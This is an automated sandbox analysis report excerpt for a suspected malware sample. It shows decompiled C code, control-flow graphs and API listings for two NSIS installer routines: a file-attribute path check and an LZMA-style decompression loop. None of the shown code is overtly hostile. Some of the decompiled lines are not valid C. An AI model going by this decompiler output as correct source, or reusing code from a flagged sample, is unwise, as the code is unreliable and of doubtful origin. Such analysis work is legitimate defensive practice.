                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$Directory$AttributesCreateCurrentFile
                                                                                              • String ID: C:\Users\user\AppData\Local\Temp
                                                                                              • API String ID: 1892508949-47812868
                                                                                              • Opcode ID: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                              • Instruction ID: a0118e7b9b939ef3ea3e51add98df8039a5aa70d3b8e99a19be4f9c31e9f39fe
                                                                                              • Opcode Fuzzy Hash: 5100f8edfc5c73fcce05ecfe13f7e88f84c01c09c33b7a9b27ef58f2b5b0e964
                                                                                              • Instruction Fuzzy Hash: 04112231508105EBCF30AFA0CD4099E36A0EF15329B28493BF901B22F1DB3E4982DB5E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 0040603F Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 47stringCOMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 673 40603f-40605a call 406668 call 405fe2 678 406060-40606d call 4068ef 673->678 679 40605c-40605e 673->679 683 40607d-406081 678->683 684 40606f-406075 678->684 680 4060b8-4060ba 679->680 686 406097-4060a0 lstrlenW 683->686 684->679 685 406077-40607b 684->685 685->679 685->683 687 4060a2-4060b6 call 405f37 GetFileAttributesW 686->687 688 406083-40608a call 40699e 686->688 687->680 693 406091-406092 call 405f83 688->693 694 40608c-40608f 688->694 693->686 694->679 694->693
                                                                                              C-Code - Quality: 53%
                                                                                              			E0040603F(void* __eflags, intOrPtr _a4) {
				int _t11;
				signed char* _t12;
				long _t16;
				intOrPtr _t18;
				intOrPtr* _t21;
				signed int _t23;

				E00406668(0x425f50, _a4);
				_t21 = E00405FE2(0x425f50);
				if(_t21 != 0) {
					E004068EF(_t21);
					if(( *0x42a278 & 0x00000080) == 0) {
						L5:
						_t23 = _t21 - 0x425f50 >> 1;
						while(1) {
							_t11 = lstrlenW(0x425f50);
							_push(0x425f50);
							if(_t11 <= _t23) {
								break;
							}
							_t12 = E0040699E();
							if(_t12 == 0 || ( *_t12 & 0x00000010) != 0) {
								E00405F83(0x425f50);
								continue;
							} else {
								goto L1;
							}
						}
						E00405F37();
						_t16 = GetFileAttributesW(??); // executed
						return 0 | _t16 != 0xffffffff;
					}
					_t18 =  *_t21;
					if(_t18 == 0 || _t18 == 0x5c) {
						goto L1;
					} else {
						goto L5;
					}
				}
				L1:
				return 0;
			}









                                                                                              0x0040604b
                                                                                              0x00406056
                                                                                              0x0040605a
                                                                                              0x00406061
                                                                                              0x0040606d
                                                                                              0x0040607d
                                                                                              0x0040607f
                                                                                              0x00406097
                                                                                              0x00406098
                                                                                              0x0040609f
                                                                                              0x004060a0
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406083
                                                                                              0x0040608a
                                                                                              0x00406092
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x0040608a
                                                                                              0x004060a2
                                                                                              0x004060a8
                                                                                              0x00000000
                                                                                              0x004060b6
                                                                                              0x0040606f
                                                                                              0x00406075
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00000000
                                                                                              0x00406075
                                                                                              0x0040605c
                                                                                              0x00000000

                                                                                              APIs
                                                                                                • Part of subcall function 00406668: lstrcpynW.KERNEL32(?,?,00000400,004037B0,00429260,NSIS Error), ref: 00406675
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(?,?,00425F50,?,00406056,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00405FF0
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 00405FF5
                                                                                                • Part of subcall function 00405FE2: CharNextW.USER32(00000000), ref: 0040600D
                                                                                              • lstrlenW.KERNEL32(00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560,00000000), ref: 00406098
                                                                                              • GetFileAttributesW.KERNELBASE(00425F50,00425F50,00425F50,00425F50,00425F50,00425F50,00000000,00425F50,00425F50,7476FAA0,?,7476F560,00405D94,?,7476FAA0,7476F560), ref: 004060A8
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000000.00000002.319378682.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000000.00000002.319372400.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319385831.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.000000000040C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000425000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000427000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319392752.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                              • Associated: 00000000.00000002.319466753.000000000043B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_0_2_400000_SecuriteInfo.jbxd
                                                                                              Similarity
                                                                                              • API ID: CharNext$AttributesFilelstrcpynlstrlen
                                                                                              • String ID: P_B
                                                                                              • API String ID: 3248276644-906794629
                                                                                              • Opcode ID: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                              • Instruction ID: df110f430b83b9381375b5fd3fa67f6c4419d4890c6468873e0fced3c2676832
                                                                                              • Opcode Fuzzy Hash: 900e3a3aedd828ccf636743a116f58552bc6887dcb5d3e9637a901da882d1290
                                                                                              • Instruction Fuzzy Hash: 0DF07826144A1216E622B23A0C05BAF05098F82354B07063FFC93B22E1DF3C8973C43E
                                                                                              Uniqueness

                                                                                              Uniqueness Score: -1.00%

                                                                                              Function 00407194 Relevance: 5.2, APIs: 4, Instructions: 236COMMON
                                                                                              Download Yara Rule

                                                                                              Control-flow Graph

                                                                                              • Executed
                                                                                              • Not Executed
                                                                                              control_flow_graph 696 407194-40719a 697 40719c-40719e 696->697 698 40719f-4071bd 696->698 697->698 699 407490-40749d 698->699 700 4073cb-4073e0 698->700 703 4074c7-4074cb 699->703 701 4073e2-4073f8 700->701 702 4073fa-407410 700->702 704 407413-40741a 701->704 702->704 705 40752b-40753e 703->705 706 4074cd-4074ee 703->706 707 407441 704->707 708 40741c-407420 704->708 711 407447-40744d 705->711 709 4074f0-407505 706->709 710 407507-40751a 706->710 707->711 712 407426-40743e 708->712 713 4075cf-4075d9 708->713 714 40751d-407524 709->714 710->714 716 406bf2 711->716 717 4075fa 711->717 712->707 718 4075e5-4075f8 713->718 719 4074c4 714->719 720 407526 714->720 721 406bf9-406bfd 716->721 722 406d39-406d5a 716->722 723 406c9e-406ca2 716->723 724 406d0e-406d12 716->724 726 4075fd-407601 717->726 718->726 719->703 727 4074a9-4074c1 720->727 728 4075db 720->728 721->718 729 406c03-406c10 721->729 722->700 732 406ca8-406cc1 723->732 733 40754e-407558 723->733 730 406d18-406d2c 724->730 731 40755d-407567 724->731 727->719 728->718 729->717 734 406c16-406c5c 729->734 735 406d2f-406d37 730->735 731->718 736 406cc4-406cc8 732->736 733->718 737 406c84-406c86 734->737 738 406c5e-406c62 734->738 735->722 735->724 736->723 739 406cca-406cd0 736->739 744 406c94-406c9c 737->744 745 406c88-406c92 737->745 742 406c64-406c67 GlobalFree 738->742 743 406c6d-406c7b GlobalAlloc 738->743 740 406cd2-406cd9 739->740 741 406cfa-406d0c 739->741 746 406ce4-406cf4 GlobalAlloc 740->746 747 406cdb-406cde GlobalFree 740->747 741->735 742->743 743->717 748 406c81 743->748 744->736 745->744 745->745 746->717 746->741 747->746 748->737
                                                                                              C-Code - Quality: 99%
                                                                                              			E00407194() {
				signed int _t530;
				void _t537;
				signed int _t538;
				signed int _t539;
				unsigned short _t569;
				signed int _t579;
				signed int _t607;
				void* _t627;
				signed int _t628;
				signed int _t635;
				signed int* _t643;
				void* _t644;

				L0:
				while(1) {
					L0:
					_t530 =  *(_t644 - 0x30);
					if(_t530 >= 4) {
					}
					 *(_t644 - 0x40) = 6;
					 *(_t644 - 0x7c) = 0x19;
					 *((intOrPtr*)(_t644 - 0x58)) = (_t530 << 7) +  *(_t644 - 4) + 0x360;
					while(1) {
						L145:
						 *(_t644 - 0x50) = 1;
						 *(_t644 - 0x48) =  *(_t644 - 0x40);
						while(1) {
							L149:
							if( *(_t644 - 0x48) <= 0) {
								goto L155;
							}
							L150:
							_t627 =  *(_t644 - 0x50) +  *(_t644 - 0x50);
							_t643 = _t627 +  *((intOrPtr*)(_t644 - 0x58));
							 *(_t644 - 0x54) = _t643;
							_t569 =  *_t643;
							_t635 = _t569 & 0x0000ffff;
							_t607 = ( *(_t644 - 0x10) >> 0xb) * _t635;
							if( *(_t644 - 0xc) >= _t607) {
								 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t607;
								 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t607;
								_t628 = _t627 + 1;
								 *_t643 = _t569 - (_t569 >> 5);
								 *(_t644 - 0x50) = _t628;
							} else {
								 *(_t644 - 0x10) = _t607;
								 *(_t644 - 0x50) =  *(_t644 - 0x50) << 1;
								 *_t643 = (0x800 - _t635 >> 5) + _t569;
							}
							if( *(_t644 - 0x10) >= 0x1000000) {
								L148:
								_t487 = _t644 - 0x48;
								 *_t487 =  *(_t644 - 0x48) - 1;
								L149:
								if( *(_t644 - 0x48) <= 0) {
									goto L155;
								}
								goto L150;
							} else {
								L154:
								L146:
								if( *(_t644 - 0x6c) == 0) {
									L169:
									 *(_t644 - 0x88) = 0x18;
									L170:
									_t579 = 0x22;
									memcpy( *(_t644 - 0x90), _t644 - 0x88, _t579 << 2);
									_t539 = 0;
									L172:
									return _t539;
								}
								L147:
								 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
								 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
								_t484 = _t644 - 0x70;
								 *_t484 =  &(( *(_t644 - 0x70))[1]);
								 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
								goto L148;
							}
							L155:
							_t537 =  *(_t644 - 0x7c);
							 *((intOrPtr*)(_t644 - 0x44)) =  *(_t644 - 0x50) - (1 <<  *(_t644 - 0x40));
							while(1) {
								L140:
								 *(_t644 - 0x88) = _t537;
								while(1) {
									L1:
									_t538 =  *(_t644 - 0x88);
									if(_t538 > 0x1c) {
										break;
									}
									L2:
									switch( *((intOrPtr*)(_t538 * 4 +  &M00407602))) {
										case 0:
											L3:
											if( *(_t644 - 0x6c) == 0) {
												goto L170;
											}
											L4:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t538 =  *( *(_t644 - 0x70));
											if(_t538 > 0xe1) {
												goto L171;
											}
											L5:
											_t542 = _t538 & 0x000000ff;
											_push(0x2d);
											asm("cdq");
											_pop(_t581);
											_push(9);
											_pop(_t582);
											_t638 = _t542 / _t581;
											_t544 = _t542 % _t581 & 0x000000ff;
											asm("cdq");
											_t633 = _t544 % _t582 & 0x000000ff;
											 *(_t644 - 0x3c) = _t633;
											 *(_t644 - 0x1c) = (1 << _t638) - 1;
											 *((intOrPtr*)(_t644 - 0x18)) = (1 << _t544 / _t582) - 1;
											_t641 = (0x300 << _t633 + _t638) + 0x736;
											if(0x600 ==  *((intOrPtr*)(_t644 - 0x78))) {
												L10:
												if(_t641 == 0) {
													L12:
													 *(_t644 - 0x48) =  *(_t644 - 0x48) & 0x00000000;
													 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
													goto L15;
												} else {
													goto L11;
												}
												do {
													L11:
													_t641 = _t641 - 1;
													 *((short*)( *(_t644 - 4) + _t641 * 2)) = 0x400;
												} while (_t641 != 0);
												goto L12;
											}
											L6:
											if( *(_t644 - 4) != 0) {
												GlobalFree( *(_t644 - 4));
											}
											_t538 = GlobalAlloc(0x40, 0x600); // executed
											 *(_t644 - 4) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												 *((intOrPtr*)(_t644 - 0x78)) = 0x600;
												goto L10;
											}
										case 1:
											L13:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L157:
												 *(_t644 - 0x88) = 1;
												goto L170;
											}
											L14:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x40) =  *(_t644 - 0x40) | ( *( *(_t644 - 0x70)) & 0x000000ff) <<  *(_t644 - 0x48) << 0x00000003;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											_t45 = _t644 - 0x48;
											 *_t45 =  *(_t644 - 0x48) + 1;
											__eflags =  *_t45;
											L15:
											if( *(_t644 - 0x48) < 4) {
												goto L13;
											}
											L16:
											_t550 =  *(_t644 - 0x40);
											if(_t550 ==  *(_t644 - 0x74)) {
												L20:
												 *(_t644 - 0x48) = 5;
												 *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) =  *( *(_t644 - 8) +  *(_t644 - 0x74) - 1) & 0x00000000;
												goto L23;
											}
											L17:
											 *(_t644 - 0x74) = _t550;
											if( *(_t644 - 8) != 0) {
												GlobalFree( *(_t644 - 8));
											}
											_t538 = GlobalAlloc(0x40,  *(_t644 - 0x40)); // executed
											 *(_t644 - 8) = _t538;
											if(_t538 == 0) {
												goto L171;
											} else {
												goto L20;
											}
										case 2:
											L24:
											_t557 =  *(_t644 - 0x60) &  *(_t644 - 0x1c);
											 *(_t644 - 0x84) = 6;
											 *(_t644 - 0x4c) = _t557;
											_t642 =  *(_t644 - 4) + (( *(_t644 - 0x38) << 4) + _t557) * 2;
											goto L132;
										case 3:
											L21:
											__eflags =  *(_t644 - 0x6c);
											if( *(_t644 - 0x6c) == 0) {
												L158:
												 *(_t644 - 0x88) = 3;
												goto L170;
											}
											L22:
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											_t67 = _t644 - 0x70;
											 *_t67 =  &(( *(_t644 - 0x70))[1]);
											__eflags =  *_t67;
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L23:
											 *(_t644 - 0x48) =  *(_t644 - 0x48) - 1;
											if( *(_t644 - 0x48) != 0) {
												goto L21;
											}
											goto L24;
										case 4:
											L133:
											_t559 =  *_t642;
											_t626 = _t559 & 0x0000ffff;
											_t596 = ( *(_t644 - 0x10) >> 0xb) * _t626;
											if( *(_t644 - 0xc) >= _t596) {
												 *(_t644 - 0x10) =  *(_t644 - 0x10) - _t596;
												 *(_t644 - 0xc) =  *(_t644 - 0xc) - _t596;
												 *(_t644 - 0x40) = 1;
												_t560 = _t559 - (_t559 >> 5);
												__eflags = _t560;
												 *_t642 = _t560;
											} else {
												 *(_t644 - 0x10) = _t596;
												 *(_t644 - 0x40) =  *(_t644 - 0x40) & 0x00000000;
												 *_t642 = (0x800 - _t626 >> 5) + _t559;
											}
											if( *(_t644 - 0x10) >= 0x1000000) {
												goto L139;
											} else {
												goto L137;
											}
										case 5:
											L137:
											if( *(_t644 - 0x6c) == 0) {
												L168:
												 *(_t644 - 0x88) = 5;
												goto L170;
											}
											L138:
											 *(_t644 - 0x10) =  *(_t644 - 0x10) << 8;
											 *(_t644 - 0x6c) =  *(_t644 - 0x6c) - 1;
											 *(_t644 - 0x70) =  &(( *(_t644 - 0x70))[1]);
											 *(_t644 - 0xc) =  *(_t644 - 0xc) << 0x00000008 |  *( *(_t644 - 0x70)) & 0x000000ff;
											L139:
											_t537 =  *(_t644 - 0x84);
											L140:
											 *(_t644 - 0x88) = _t537;
											goto L1;
										case 6:
											L25:
											__edx = 0;
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L36:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x34) = 1;
												 *(__ebp - 0x84) = 7;
												__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L26:
											__eax =  *(__ebp - 0x5c) & 0x000000ff;
											__esi =  *(__ebp - 0x60);
											__cl = 8;
											__cl = 8 -  *(__ebp - 0x3c);
											__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
											__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
											__ecx =  *(__ebp - 0x3c);
											__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
											__ecx =  *(__ebp - 4);
											(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
											__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
											__eflags =  *(__ebp - 0x38) - 4;
											__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
											if( *(__ebp - 0x38) >= 4) {
												__eflags =  *(__ebp - 0x38) - 0xa;
												if( *(__ebp - 0x38) >= 0xa) {
													_t98 = __ebp - 0x38;
													 *_t98 =  *(__ebp - 0x38) - 6;
													__eflags =  *_t98;
												} else {
													 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
												}
											} else {
												 *(__ebp - 0x38) = 0;
											}
											__eflags =  *(__ebp - 0x34) - __edx;
											if( *(__ebp - 0x34) == __edx) {
												L35:
												__ebx = 0;
												__ebx = 1;
												goto L61;
											} else {
												L32:
												__eax =  *(__ebp - 0x14);
												__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
												__eflags = __eax -  *(__ebp - 0x74);
												if(__eax >=  *(__ebp - 0x74)) {
													__eax = __eax +  *(__ebp - 0x74);
													__eflags = __eax;
												}
												__ecx =  *(__ebp - 8);
												__ebx = 0;
												__ebx = 1;
												__al =  *((intOrPtr*)(__eax + __ecx));
												 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
												goto L41;
											}
										case 7:
											L66:
											__eflags =  *(__ebp - 0x40) - 1;
											if( *(__ebp - 0x40) != 1) {
												L68:
												__eax =  *(__ebp - 0x24);
												 *(__ebp - 0x80) = 0x16;
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												__eax =  *(__ebp - 0x2c);
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xa;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
												__eax =  *(__ebp - 4);
												__eax =  *(__ebp - 4) + 0x664;
												__eflags = __eax;
												 *(__ebp - 0x58) = __eax;
												goto L69;
											}
											L67:
											__eax =  *(__ebp - 4);
											__ecx =  *(__ebp - 0x38);
											 *(__ebp - 0x84) = 8;
											__esi =  *(__ebp - 4) + 0x198 +  *(__ebp - 0x38) * 2;
											goto L132;
										case 8:
											L70:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xa;
												__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
											} else {
												__eax =  *(__ebp - 0x38);
												__ecx =  *(__ebp - 4);
												__eax =  *(__ebp - 0x38) + 0xf;
												 *(__ebp - 0x84) = 9;
												 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
												__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
											}
											goto L132;
										case 9:
											L73:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												goto L90;
											}
											L74:
											__eflags =  *(__ebp - 0x60);
											if( *(__ebp - 0x60) == 0) {
												goto L171;
											}
											L75:
											__eax = 0;
											__eflags =  *(__ebp - 0x38) - 7;
											_t259 =  *(__ebp - 0x38) - 7 >= 0;
											__eflags = _t259;
											0 | _t259 = _t259 + _t259 + 9;
											 *(__ebp - 0x38) = _t259 + _t259 + 9;
											goto L76;
										case 0xa:
											L82:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												L84:
												__eax =  *(__ebp - 4);
												__ecx =  *(__ebp - 0x38);
												 *(__ebp - 0x84) = 0xb;
												__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
												goto L132;
											}
											L83:
											__eax =  *(__ebp - 0x28);
											goto L89;
										case 0xb:
											L85:
											__eflags =  *(__ebp - 0x40);
											if( *(__ebp - 0x40) != 0) {
												__ecx =  *(__ebp - 0x24);
												__eax =  *(__ebp - 0x20);
												 *(__ebp - 0x20) =  *(__ebp - 0x24);
											} else {
												__eax =  *(__ebp - 0x24);
											}
											__ecx =  *(__ebp - 0x28);
											 *(__ebp - 0x24) =  *(__ebp - 0x28);
											L89:
											__ecx =  *(__ebp - 0x2c);
											 *(__ebp - 0x2c) = __eax;
											 *(__ebp - 0x28) =  *(__ebp - 0x2c);
											L90:
											__eax =  *(__ebp - 4);
											 *(__ebp - 0x80) = 0x15;
											__eax =  *(__ebp - 4) + 0xa68;
											 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
											goto L69;
										case 0xc:
											L99:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L164:
												 *(__ebp - 0x88) = 0xc;
												goto L170;
											}
											L100:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t334 = __ebp - 0x70;
											 *_t334 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t334;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											__eax =  *(__ebp - 0x2c);
											goto L101;
										case 0xd:
											L37:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L159:
												 *(__ebp - 0x88) = 0xd;
												goto L170;
											}
											L38:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t122 = __ebp - 0x70;
											 *_t122 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t122;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											L39:
											__eax =  *(__ebp - 0x40);
											__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
											if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
												goto L48;
											}
											L40:
											__eflags = __ebx - 0x100;
											if(__ebx >= 0x100) {
												goto L54;
											}
											L41:
											__eax =  *(__ebp - 0x5b) & 0x000000ff;
											 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
											__ecx =  *(__ebp - 0x58);
											__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
											 *(__ebp - 0x48) = __eax;
											__eax = __eax + 1;
											__eax = __eax << 8;
											__eax = __eax + __ebx;
											__esi =  *(__ebp - 0x58) + __eax * 2;
											 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
											__ax =  *__esi;
											 *(__ebp - 0x54) = __esi;
											__edx = __ax & 0x0000ffff;
											__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
											__eflags =  *(__ebp - 0xc) - __ecx;
											if( *(__ebp - 0xc) >= __ecx) {
												 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
												__cx = __ax;
												 *(__ebp - 0x40) = 1;
												__cx = __ax >> 5;
												__eflags = __eax;
												__ebx = __ebx + __ebx + 1;
												 *__esi = __ax;
											} else {
												 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
												 *(__ebp - 0x10) = __ecx;
												0x800 = 0x800 - __edx;
												0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
												__ebx = __ebx + __ebx;
												 *__esi = __cx;
											}
											__eflags =  *(__ebp - 0x10) - 0x1000000;
											 *(__ebp - 0x44) = __ebx;
											if( *(__ebp - 0x10) >= 0x1000000) {
												goto L39;
											} else {
												L45:
												goto L37;
											}
										case 0xe:
											L46:
											__eflags =  *(__ebp - 0x6c);
											if( *(__ebp - 0x6c) == 0) {
												L160:
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											L47:
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t156 = __ebp - 0x70;
											 *_t156 =  *(__ebp - 0x70) + 1;
											__eflags =  *_t156;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											while(1) {
												L48:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													break;
												}
												L49:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t170 = __edx + 1; // 0x1
													__ebx = _t170;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													continue;
